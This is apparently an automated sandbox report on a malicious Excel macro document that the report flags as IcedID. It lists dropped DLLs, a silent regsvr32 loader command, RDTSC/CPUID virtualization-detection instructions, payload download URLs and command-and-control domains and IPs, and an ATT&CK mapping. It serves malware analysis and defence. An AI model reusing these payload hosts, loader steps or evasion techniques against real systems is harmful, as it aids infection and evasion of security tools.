          Source: XRAY.dll.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002C1E50 3_2_002C1E50
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00201E50 4_2_00201E50
          Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_020F1E50 5_2_020F1E50
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000002C1E71 second address: 00000000002C1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000002C1EAB second address: 00000000002C1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000201E71 second address: 0000000000201E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000201EAB second address: 0000000000201EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000020F1E71 second address: 00000000020F1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000020F1EAB second address: 00000000020F1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002C2434 rdtsc 3_2_002C2434
          Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,3_2_002C27BC
          Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_002027BC
          Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,5_2_020F27BC
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
          Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002C2434 rdtsc 3_2_002C2434

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.37.209 80Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
          Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002C22DC LookupAccountNameW,3_2_002C22DC

          Stealing of Sensitive Information:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2112727320.00000000001F7000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2408, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2296, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2112727320.00000000001F7000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2408, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2296, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsExploitation for Client Execution43Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Regsvr321NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 444688 Sample: Outfordelivery799862.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Document exploit detected (drops PE files) 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 6 other signatures 2->53 6 EXCEL.EXE 53 28 2->6         started        process3 dnsIp4 27 uppercilio.fun 104.21.55.83, 49169, 80 CLOUDFLARENETUS United States 6->27 29 voopeople.fun 172.67.194.117, 49168, 80 CLOUDFLARENETUS United States 6->29 31 thousandsyears.download 172.67.198.51, 49167, 80 CLOUDFLARENETUS United States 6->31 19 C:\Users\user\XZIBIT.dll, PE32+ 6->19 dropped 21 C:\Users\user\XTOWN.dll, PE32+ 6->21 dropped 23 C:\Users\user\XRAY.dll, PE32+ 6->23 dropped 25 3 other malicious files 6->25 dropped 55 Document exploit detected (creates forbidden files) 6->55 57 Document exploit detected (UrlDownloadToFile) 6->57 11 regsvr32.exe 4 6->11         started        15 regsvr32.exe 6->15         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 33 astrocycle.download 104.21.37.209, 49171, 49173, 49175 CLOUDFLARENETUS United States 11->33 35 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49170, 49172 AMAZON-02US United States 11->35 45 2 other IPs or domains 11->45 59 System process connects to network (likely due to code injection or exploit) 11->59 61 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 37 tp.8e49140c2-frontier.amazon.com 15->37 39 aws.amazon.com 15->39 41 tp.8e49140c2-frontier.amazon.com 17->41 43 aws.amazon.com 17->43 signatures9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.buzzsprout.com;0%Avira URL Cloudsafe
          http://astrocycle.download/0%Avira URL Cloudsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://crl.roox0%Avira URL Cloudsafe
          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          https://prod-us-west-2.csp-report.marketing.aws.dev/submit0%Avira URL Cloudsafe
          http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          https://amazonwebservices.d2.sc.omtrdc.net0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-12F7F67R64DWA9SFNPP2CX-Content-Ty0%Avira URL Cloudsafe
          https://112-tzm-766.mktoutil.com0%Avira URL Cloudsafe
          https://download.stormacq.com/aws/podcast/0%Avira URL Cloudsafe
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
          astrocycle.download0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          uppercilio.fun
          		104.21.55.83
          		truefalse
            		unknown
            thousandsyears.download
            		172.67.198.51
            		truefalse
              		unknown
              voopeople.fun
              		172.67.194.117
              		truefalse
                		unknown
                astrocycle.download
                		104.21.37.209
                		truetrue
                  		unknown
                  dr49lng3n1n2s.cloudfront.net
                  		13.224.92.73
                  		truefalse
                    		high
                    aws.amazon.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://astrocycle.download/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://uppercilio.fun/div/44376,8555986111.jpgfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://thousandsyears.download/div/44376,8555986111.jpgfalse
                      • Avira URL Cloud: safe
                      		unknown
                      astrocycle.downloadtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.linkedin.comregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                        		high
                        https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                          		high
                          https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000003.00000002.2118280737.00000000034EF000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                            		high
                            https://c0.b0.p.awsstatic.comregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                              		high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.regional-table.region-services.aws.a2z.comregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                		high
                                https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                  		high
                                  https://amazon.com/Lregsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpfalse
                                    		high
                                    https://aws.amazon.com/ar/regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://a0.p.awsstatic.comregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                        		high
                                        https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                                          		high
                                          https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                                            		high
                                            https://aws.amazon.com/ru/regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.buzzsprout.com;regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                                                		high
                                                https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://amazon.com/1regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpfalse
                                                    		high
                                                    https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://p.adsymptotic.comregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://aws.amazon.com/th/regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://docs.aws.amazon.comregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.windows.com/pctv.regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://d2a6igt6jhaluh.cloudfront.netregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://dftu77xade0tc.cloudfront.netregsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://aws.amazon.com/search/regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://crl.rooxregsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://aws.amazon.com/vi/regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpfalse
                                                                                  		high
